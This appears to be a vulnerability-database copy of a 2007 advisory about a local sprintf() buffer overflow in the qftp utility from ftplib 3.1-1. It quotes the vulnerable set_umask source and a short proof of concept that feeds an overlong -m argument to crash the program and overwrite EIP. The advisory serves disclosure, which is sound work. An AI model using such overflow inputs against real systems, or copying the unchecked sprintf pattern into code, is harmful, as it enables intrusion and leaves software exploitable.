Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16377
HistoryMar 17, 2007 - 12:00 a.m.

QFTP (LIBFtp 3.1-1) (command line) sprintf() local buffer overflow

2007-03-1700:00:00
vulners.com
30

http://nbpfaus.net/~pfau/ftplib/

qftp is a utility that performs file transfers using ftplib based on
instructions presented on the command line.

>> Description

buffer overflow in sprintf(), set_umask don't check sizelen of passed argument.

>> Source error

in main():
337: case 'm' : set_umask(optarg); break;

void set_umask(char *m)
{
char buf[80];
sprintf(buf,"umask %s", m);
ftp_connect();
FtpSite(buf, conn);
}

>> POC

$ gcc ftplib.c getopt.c qftp.c -o ftpsend
$ ftpsend localhost -l login -p passwd -m `perl -e "print 'a'x90"`
Segmentation fault

eip addr: $1 = (void *) 0x61616161


~ starcadi